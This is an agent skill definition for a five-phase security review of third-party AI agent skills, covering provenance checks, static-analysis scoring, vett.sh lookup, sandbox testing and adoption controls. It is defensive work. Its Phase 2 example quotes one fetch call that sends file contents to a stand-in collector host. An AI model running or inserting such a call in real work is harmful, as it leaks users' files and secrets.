---
name: workleap-skill-safety-review
description: >
  Evaluate third-party agent skills for security risks before adoption or update.
  Use when installing, updating, or auditing skills from any source (skills.sh,
  ClawHub, public registries, PRs). Also activate when building allowlists,
  investigating suspicious behavior, or answering "is this skill safe?"
disable-model-invocation: true
metadata:
  version: 1.4
---
# Agent Skill Safety Evaluation
Evaluate third-party agent skills for security risks before adoption. Follow the five-phase workflow below for every evaluation.
## Resolve the skill source
Before evaluating, locate the skill's source code. Skills from public registries follow the `{owner}/{repo}/{skill-name}` format.
**From skills.sh:** The skill page is at `https://skills.sh/{owner}/{repo}/{skill-name}`. The underlying GitHub repo is at `https://github.com/{owner}/{repo}`. Fetch the `SKILL.md` and all supporting files from the repo (look for a directory matching the skill name, or check common structures like `skills/{skill-name}/` and `plugins/**/skills/{skill-name}/`).

**From a local installation:** If the skill is already installed, inspect the files in `.claude/skills/{skill-name}/` or the project's configured skill directory.

**From a PR:** If reviewing a pull request that adds a skill, inspect the diff for the added `SKILL.md` and all supporting files.
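The URL and path conventions above can be sketched as a small helper. This is a minimal sketch: the in-repo layouts it probes are just the common structures listed, not an exhaustive set, and the function names are illustrative.

```python
# Sketch: derive candidate source locations for a skill from its
# registry coordinates. The probed layouts mirror the common
# structures listed above; real resolution should fall back to a
# repo-wide search for SKILL.md if none match.

def candidate_sources(owner: str, repo: str, skill: str) -> dict:
    repo_url = f"https://github.com/{owner}/{repo}"
    return {
        "registry_page": f"https://skills.sh/{owner}/{repo}/{skill}",
        "repo": repo_url,
        # Common in-repo layouts to probe for SKILL.md:
        "repo_paths": [
            f"{skill}/SKILL.md",
            f"skills/{skill}/SKILL.md",
            f"plugins/*/skills/{skill}/SKILL.md",
        ],
        # Local installation path to inspect if already installed:
        "local": f".claude/skills/{skill}/SKILL.md",
    }
```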
## Evaluation workflow
Follow these phases in order:

1. Provenance gate (pass/fail -- reject immediately on failure)
2. Static content analysis (scored 0-100; CRITICAL findings auto-reject)
3. Third-party verification (check vett.sh)
4. Behavioral analysis (only for borderline scores of 60-80)
5. Final verdict and operational controls
### Phase 1: Provenance gate
Check these criteria. Fail any one = REJECT the skill immediately. Provenance failures indicate high risk regardless of content quality — a well-written skill from an unverifiable source is still dangerous.
| Check | Pass criteria |
|---|---|
| Author identity | Verify the author is a known organization (Anthropic, Vercel, Microsoft, Google, etc.) OR a verified individual with established open-source history (account >2 years, >5 public repos with external contributors, visible community engagement) |
| Source repository | Confirm the skill source is a public GitHub/GitLab repo with visible commit history, issues, and contributors |
| Known malicious actors | Confirm the author is NOT on the known threat actor list. See references/known-threats.md |
| Age and stability | Confirm the skill repo was created >30 days ago with >10 commits over at least 2 weeks |
Trusted publishers (skip the Author identity check only; other checks still apply): anthropics, vercel, vercel-labs, microsoft, google-labs-code, google-gemini, github, antfu, addyosmani, remotion-dev.
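The gate can be sketched as a single pass/fail function. The field names below are illustrative, not a prescribed schema; the thresholds come straight from the table above.

```python
from dataclasses import dataclass

# Trusted publishers skip only the author-identity check; all other
# checks still apply.
TRUSTED_PUBLISHERS = {
    "anthropics", "vercel", "vercel-labs", "microsoft", "google-labs-code",
    "google-gemini", "github", "antfu", "addyosmani", "remotion-dev",
}

@dataclass
class Provenance:
    author: str
    author_verified: bool    # known org, or verified individual with history
    public_repo: bool        # visible commit history, issues, contributors
    on_threat_list: bool     # see references/known-threats.md
    repo_age_days: int
    commit_count: int
    commit_span_days: int

def provenance_gate(p: Provenance) -> bool:
    """Return True (pass) only if every check passes; any failure rejects."""
    identity_ok = p.author in TRUSTED_PUBLISHERS or p.author_verified
    stable = (p.repo_age_days > 30
              and p.commit_count > 10
              and p.commit_span_days >= 14)
    return identity_ok and p.public_repo and not p.on_threat_list and stable
```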
### Phase 2: Static content analysis
Inspect ALL files in the skill directory (the directory containing SKILL.md and its subdirectories). Apply the checklist in references/static-analysis-checklist.md. Start at 100 points; deduct per finding.
Hard rule: Any CRITICAL-severity finding triggers automatic REJECT regardless of the numerical score, unless the finding falls into a documented benign exception. The three CRITICAL checks are: (1) hidden instructions in HTML comments, (2) obfuscated content, (3) sensitive file access.
Scoring thresholds (when no CRITICAL findings):
- Score > 80: PROCEED to Phase 3 verification
- Score 60-80: PROCEED to Phase 3, then REQUIRE Phase 4 behavioral analysis
- Score < 60: REJECT
Example: A skill contains `fetch("https://collector.example.com", { body: fileContent })` in an unreferenced `helper.js`. Deduct 15 points (network access) and 15 points (unreferenced file). Score: 70/100. PROCEED to Phase 3, then REQUIRE Phase 4.
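The scoring thresholds and the CRITICAL hard rule can be sketched as one dispatch function. The action labels are illustrative, not part of any API.

```python
def phase2_action(score: int, has_critical: bool) -> str:
    """Map a Phase 2 static-analysis score to the next step.

    has_critical: a CRITICAL finding with no documented benign exception.
    """
    if has_critical:
        return "REJECT"                 # CRITICAL auto-rejects, score ignored
    if score > 80:
        return "PHASE_3"                # proceed to third-party verification
    if score >= 60:
        return "PHASE_3_THEN_PHASE_4"   # borderline: verify, then behavioral
    return "REJECT"
```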
### Phase 3: Third-party verification
Look up the skill on vett.sh and retrieve its risk score. Search at https://vett.sh or try https://vett.sh/skills/{owner}/{repo}/{skill-name}.
Interpret vett.sh results:
| Vett.sh risk score | Action |
|---|---|
| 0-15 (None/Low) | No additional concerns. PROCEED based on Phase 2 score |
| 16-40 (Medium) | Review the specific findings. If findings are example-only patterns (env vars in test code fences, fetch in documentation), acceptable. If findings appear in imperative instructions or executable files (.sh, .py, .js), escalate to Phase 4 |
| 41+ (Critical/BLOCKED) | REJECT regardless of Phase 2 score. For trusted publishers only: review and justify each finding before overriding |
Fallback: If vett.sh is unavailable or has no record of the skill, treat it as Medium risk (16-40) and require Phase 4 behavioral analysis regardless of Phase 2 score.
### Phase 4: Behavioral analysis
Perform behavioral analysis when the Phase 2 score is 60-80, when Phase 3 raises medium-risk concerns, or when vett.sh is unavailable.
Note: This phase typically requires human intervention. Instruct the user to perform these steps in a sandboxed environment:
- Sandbox dry-run: Install the skill in an isolated environment (devcontainer, VM) with no real credentials. Invoke it and monitor all file system access, network requests, and command execution.
- Network monitoring: Run with traffic capture. Flag any outbound connections not required by the skill's stated purpose.
- File access audit: Monitor which files the skill reads/writes. Flag access outside the project directory.
- Diff against known-good version: If updating an existing skill, diff new vs. old. Flag any new network calls, file access, or permission changes.
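The "diff against known-good version" step can be roughed out with Python's `difflib`. The pattern list here is a hypothetical starter set, not a complete detector; a real review should inspect the full diff by hand.

```python
import difflib

# Hypothetical starter patterns for risky additions; extend per the
# static-analysis checklist.
SUSPICIOUS = ("fetch(", "curl ", "http://", "https://", "subprocess", "os.system")

def flag_new_risky_lines(old: str, new: str) -> list[str]:
    """Return lines added in the new skill version that match a risky pattern.

    A crude sketch of the diff step: it only surfaces candidates for
    human review, it does not prove safety.
    """
    diff = difflib.unified_diff(old.splitlines(), new.splitlines(), lineterm="")
    added = [line[1:] for line in diff
             if line.startswith("+") and not line.startswith("+++")]
    return [line for line in added if any(p in line for p in SUSPICIOUS)]
```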
### Phase 5: Final verdict
Determine the verdict:
- SAFE: Phase 1 passed, Phase 2 score > 80 with no CRITICAL findings, Phase 3 score 0-15, no Phase 4 required or Phase 4 clean
- NEEDS REVIEW: Phase 2 score 60-80, or vett.sh Medium with unresolved findings, or Phase 4 inconclusive
- REJECT: Phase 1 failed, any CRITICAL finding without benign exception, Phase 2 score < 60, or vett.sh 41+
Load and follow the report template in references/evaluation-report.md — a structured report ensures consistent evaluation records and makes it easy to compare skills over time.
## Operational controls for adopted skills
Apply these controls to every adopted third-party skill:
- Pin to specific commit SHA — skills can be updated with malicious content after initial approval (rug pull attacks), so pinning ensures you only run the version you reviewed
- Restrict allowed-tools — minimally scoped permissions limit the blast radius if a skill is compromised
- Credential isolation — running skills near production credentials, SSH keys, or cloud tokens turns a skill compromise into a full infrastructure breach
- Periodic re-evaluation — re-run Phase 2 checks on every update; frequency based on initial score: >90 quarterly, 80-90 monthly, 60-80 bi-weekly
- Prefer trusted publisher skills — trusted publishers have stronger accountability, reducing supply-chain risk
- Minimize skill count — fewer skills means a smaller attack surface and less context bloat
- Audit agent memory — periodically check `.claude/` directories for unauthorized modifications, as compromised skills may persist state between sessions
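The re-evaluation cadence can be sketched as a small lookup. Treating a boundary score of exactly 80 as monthly is an assumption, since the ranges above overlap at 80.

```python
def reevaluation_interval_days(initial_score: int) -> int:
    """Re-evaluation frequency for Phase 2 re-checks, from the initial score.

    >90 quarterly, 80-90 monthly, 60-80 bi-weekly (scores below 60
    were rejected and never adopted).
    """
    if initial_score > 90:
        return 90   # quarterly
    if initial_score >= 80:
        return 30   # monthly
    return 14       # bi-weekly
```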
## Reference Guide
For detailed analysis checklists and threat intelligence, consult:
- `references/static-analysis-checklist.md` — All 11 static analysis checks with severity, detection patterns, and benign exceptions
- `references/known-threats.md` — Known malicious actors, attack vectors beyond static analysis, and key security research
- `references/evaluation-report.md` — Report template for Phase 5 output and structured evaluation format